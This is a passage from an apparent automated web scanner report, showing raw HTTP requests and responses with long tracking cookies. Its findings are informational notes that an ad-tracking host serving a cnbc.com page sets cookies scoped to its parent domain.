rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJ4QsJCe25ayViGymJW18v6oxo5TQQ/CGgK6H8nxMD/xw6JhTybIZwS4Eca2TOPNPPf1VWx8hkmMPM/yrrSdcosckkFeddzYMSGLneI5567GeW6vbj+wWQEAWvERBw6DjPQ4L4Uubj0NaY9wI2KrzCfuCquS5+0mtq0blYCbbpeq91vpEp6PLHFjL00+eBC86WjLf8zGKgiUktukRMj4LRehj1yYj7ERIGS2HThYKZWqUMcWyBPyxSGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBegtiNfakPzZvmfKPy95K8ih9mXMMCtdrIvcMnFkigtQN54egzBWSJbEl9x+KwhkZ/L92bTvudQtQPxONyOZ7HikgclZI512pKX3M0xad6Ob271txsrs9b0Oz1Z7kPOLjNPLoxd07mty+69lekIPFKynhZKODufS/qVPftLwg4SHkAQdGCv7sxTPHqduXr1eFz4GuXBQzFZmovJP50LJ9LfJzZ0cEqo94AHzG328DlOp3pWURvqQeuQD++OpNt8z2EVRz4KiLXeBbx4qcJhurwtdDVDn1cvqzgNMc=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:11:54 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/821864121.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_A2oj="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDEnB2qzoP9RC0SyMoveM9OR5om4StALLEl9sEMSolN1SF6IV+6n10UiflLT2U8DIkh6vC9ijDteIzpW928CY8vPSxkZQD7sCDZSgJRPvl/D349BM2u/nf6SMteTvuGKPqzU6GlFHGI3s+nv5iFvZazWDB16qHPXtx2dMixNMhMXuYyV9LTfJSB3oJpCJhbD72QpRJy1Q3nVPVgI278S5j1Lr0EqdPuwR5y5ToTZ98pywq+Bl4e8DZURuDDW+zpZ5r3L8e2GTm9X53uKZb6Tg+9HAH/N9Lpo3y/RdfpMypGuFMNQeMSp6/EJWn4R1/mniD222HSLU4DvIH8FGiDQ7xXyRWVeibvzpZehJXBM22JlWBE7O6iO220AEpHueXRU6P2Xl94lsiR4CBg2W/x3pCgEIa9Q7tqARq2Esn+yFmP4Lp19zunQ68u73lFyBepWwQQROkvvsvmJLWM+TOWJuh7EYbd6Chhenx1rSx1fzvyzhCcutqba3aYSaHHP8EtoxrwYfODjZ5ThCBMRjnFOlqc3BnMJgXD3jPIVjjWI3t8WBuknb9cYMkcBnPIKVIQxQtSAsVzE5klQiJOBc7/EJgzpz/pacgF36D2GpS39Pz3wnTjf1tvFs0AeJot3uGvOPuRR4R7OQvP8FaHLuCskXdVD7VrE0mdt6FMxiVStRgK8O4IFW98Cp0JXaK3dLHpyyc1a9WbB84jgQQzYlpR0b7iqXa39XPRLhqRxT7p9VLQ6yRP3Z+99JaemEm1l7kBYVTEfxs/zX8bv99a22v4HdSlya2Ej9jdktLndghrl52gzU1hB6rWbi/eYBMe0gIT5YfSbBt2nnSYCg7791UoE+tl/3si+Kg1qxIcrdcRmODBam8UB6s0eSwxUpEjUL/0YcM6ANpyG/7Hw5OYxBELm6usxkerv7Gya625iK04nUTEI3evisO8xqhG+04Bl6Pc1kDAWQj9TGlKto6qyks9RBnUXNkWqpIpmnzpkF0W1Ny7mB/PtQwbOT/oKNxzKOnkJCC6leyVKPpcSeNxSWSCcsLUpj16XKnhnbstrQSHPEMmupokNuxDVf0aiY/rUIB5CCiSkpirhq9c2VrBMrPkUTktvC/Eba1kZzlYUYYp/z1B65fKwRLguSPrMj/XnCquTkHp2RE+jy7gxK7Ag5IDib3H3kGzvZ/hJqJP5m1KIACnfHoreHZTermSCIXuyOZxY7GxIrAQSm/tNkQs8lzj8HZOI+/nzgnSnntyR5kxxY5kMmqOR2n2JoXPP8Xpbq9P3D2eyxZGu69ACjqqXYJKamLKTu8MyYpl+DAp8XrNDwh1HfJ/4FJS5jYbVd5r0QqW2w=="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8r/x9aZAxBCInYEZ/jMMNxtAxH0lsZ65lpt0Uj/e/FhI5A3TVn+5DJtll/rGMjGkjVOUOed2RdW7jxad/LZqAIjd76eKMUJYJx5w+AglsacGy3S1OjAJnwO6Bvqk7yreLcKD++pKszo4LrUHCWE0l3Tjs6l1qsxjKUUx5QX1pZfG6XujimGDCELB57M6RZSXrZxkh/V96AjnGXiXf2iO7d87D8eaNOfPoYSqJqxQii/bSRqpkRFNV8KPAadn1owdPYofYRetaTA+TVSdGWqm+rnv8cusKMVrNA9oqDse9pvsIVWMhgIS48okikmUltNzr5FEQJqvkrrXuHtNye5fmS5wTorciWRsLTecMAyjm9/hcOetLrZcllIBKJPP6fFsT8bRLAOr2Dzp2iE6KIOfXr9IJHFiEGJQq6UcvEK81mWKLuz14aVAdkloF7hua2pV0w2mbmpnedukbYu9d3gUE4u7xEPPylvCtamrolKpLihub9ncI141FCRZeqbMDz63DyTvA0KPo68zEtHUs5+FRQiiQFTpuY414uDqTXQ8l9d61NLhvW/DK0LoeLw4/UtGUETyHQ4rB+sKkI5RcdwYkvL+DDKbTvBIntjIUwbdRvhKTPAbzoCHwUqcFI5LKcftxNV6zoQ2In2Roqi5pY680HvQHWMUBKFRsWa73HXdedSeG6+O6XX3t/L3oQQR2gioVx47bFRhUr5k+Rm7FLCPPEjuacXBGecjdP1WcwqLwvZ4PmwBrtj+Ak44mvQODzjCEGoN1IgI/UfdoflbIO+gADtcJogX8RRqMXd+y5djnhq3+lJoWsTFDJN/DhNJ8wAZsEVPnVurQTNCcGmoZ0CZ840MkjKzYThMruKwXtIidIlM1mYqEoNrlXwcVM8JaD8Dk46/l8KoDv2czl+OVEZAuQbO5t+mA5RQ4Eml9ZKj80yHLv4jjK7zYue58cRxsFWLS3PfS89HIK5eFVRCWpt4egQnLvxi24TgibGs4KUhPUcKGEw8Ao3j7NlDHTTzLdhaiUBl/sppgnT5E9FCQA9716J36SeLwKA4bi1abmF7FBaJrRZVuai/JJIt7uzE3VbdYpYoA9pTHboU4PivRs/6egAUwcCMhq1FfujoLS9m6tqwCtzFaHIhp70DkIBosoMT+tqZsp3llxZCj3bLYE9VL9QlNjSvXmKalIhJE4m2gcCixhfUEWKRizoBYKh7cxxWzelaaiUKZyOW2QQqVb2ogoDiCIKXUaWT4FJN691g8F+vgiAP+K8V1mVKNJ3FdgrF9mlrS7rb6j7yXQtSD9Q2Ryn2GcMJtsaHTqNgo18cip0oiC1T4+ZEQUbPpRFNHAo8rHAwxAflXclUC3bYUNiIrovxdnOVMbp1SnOv2R5cXcfp+IieM52iJDyoPe0gAbhGxhdO7Rf8E3DfCfjiKYGKIaxye4DlsqJ/1xGqWHveSgpxWfHLTNWQ/twJn2KuUPG3eMqO8EjbmDynIpuhtLaZPGDXV9xcEZMuoTYtWzAtZELONTTtosP4BznxD0fIe75yXOhPWyzp4iyrrUCFAFXgPJ4cfHMeFOwP+gkNQ0mGvMxraeDAtUytk45JzPMKSho4A2F7zt1D9GjriJdYjFUX0wHuDwx5rrRhgOufmkiyNX5UsBxI17yfsPBgf8nJSDkP2hyFWoTtHmGJNOtU/bvW+ojwJfL2ezmtW5npyyPostAyx6IHhzkNbQmHtA+Uf43Gh7/ET6/+p0BrJr6M+VT6XvugDsHCgA=="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JQTTXVzHGCtpU+w6+eP0liHtqFncA2iMgL2Lswq2/t7wxEnZxc6hXL/TAhJnE0dgptwwSdnEqKcnKcVGn8biBJeiwj3bt/ZbBno4eTUvRzGf2u88Dt+Xr5SMrCaC+sP2v1b0OTIJEG4UM5yIGLLzCPuCqse5myqvl/sTBSfCkzvhrWzyYVEiHyPAXS96ftkys7CVwsT5Rs7MulCQy+4fYS9rZ0Sgh4ek947bBhn4Zj9uI+LPlI4JfZQ32TQXxBwvwOTN3uNPwENsPabBxQwHPp5/4aLiCCA90/UyINB+lOenc2oXZx7bfxHZuTwOyjdiRgJsP1sXbC6eUwGWzLguWaSsMTBCe+gYW0+UgrOlKrq6vz7xu7IjxThLYC6Jeo+2vvx0Y2vQif8fLD6jUtG/lMREU86W7iI0DLsTrIFCkrm1kpy6i0cLlXiCtN1DE8scnlJ/5t8UF4Qpn7tCKWLuQ3aXB2167KHzt0fD2bZbBhAKPdXhguvUCOWZvJxKH9y4HI6W4OUleEb2gNq8+U64NHHYZurx4/mKv60j14AMaELuBCA4TRuyPUG9wTKYvhD6acG2QyZE3NbiovWnEvtk3lT4VZWg/A3rCjlkM2hEu/fJG62QYrhky0jhH

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJ4QsJCe25ayViGymJW18v6oxo5TQQ/CGgK6H8nxMD/xw6JhTybIZwS4Eca2TOPNPPf1VWx8hkmMPM/yrrSdcosckkFeddzYMSGLneI5567GeW6vbj+wWQEAWvERBw6DjPQ4L4Uubj0NaY9wI2KrzCfuCquS5+0mtq0blYCbbpeq91vpEp6PLHFjL00+eBC86WjLf8zGKgiUktukRMj4LRehj1yYj7ERIGS2HThYKZWqUMcWyBPyxSGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBegtiNfakPzZvmfKPy95K8ih9mXMMCtdrIvcMnFkigtQN54egzBWSJbEl9x+KwhkZ/L92bTvudQtQPxONyOZ7HikgclZI512pKX3M0xad6Ob271txsrs9b0Oz1Z7kPOLjNPLoxd07mty+69lekIPFKynhZKODufS/qVPftLwg4SHkAQdGCv7sxTPHqduXr1eFz4GuXBQzFZmovJP50LJ9LfJzZ0cEqo94AHzG328DlOp3pWURvqQeuQD++OpNt8z2EVRz4KiLXeBbx4qcJhurwtdDVDn1cvqzgNMc=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:11:54 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:11:54 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.198. http://pix04.revsci.net/I10985/b3/0/3/1008211/833474274.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/833474274.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOheXIQT7uItGF29/yo/tk8g7ZPQm8locHc+gQ4O3XY0n+Y1R9p5LQR/PIErQWNBrf/GhmELDb2SBYVi45leib6f+TcjX1aW0zQ/r0ApwP/UaVQAaikEpJEADFgWdDtKIlXFv4PL1BUaJzrH2RPUn/Xqe14cyhPjKhpKHCwKDiLN7ZpoTqEYsuFKvRBu2IqoSVy/5t1vlVo6PLHFjL00+ehAJFHV+aNKdWI3SWQJ9zzYJE3gOggYzS8l60cF0fRhYKZWqkcWW0BvbeT4FW1ruM8/GaXYHlxlcxlY1dHYTAJwSnBh56YsGo3OpM23g4Sg+W/5oOiiW7+as1QctRnSvvKtemWe1VHWAyJahT35bdZIwQmvQ48CkKLsbsrvtD5EoRz6nG/LcmuBS3Jn3/zoEOEBUzi69M6mTC+PEWZWQJbfRE+E5WVIp3Thw4yJ3cPPTklIFmWHjNjV1LLysLDkP3dWz0uKtSZgBTjHRQMRMICkT3e3WvYJStMWuk4t/bgY81r+yolKvpVebOAG0riueU6NKA2RTHy2dC6z8wrqYdn7xOgfCW63/UTu+4l45BNmrY1KteHuYcz51soyYLRWIiYVYTrR805k+41339fakhMofXoGz0fn+gFNr+iRy9hrLmSSF+HDB+jhnxcvr17NN0=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:29:32 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/833474274.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9k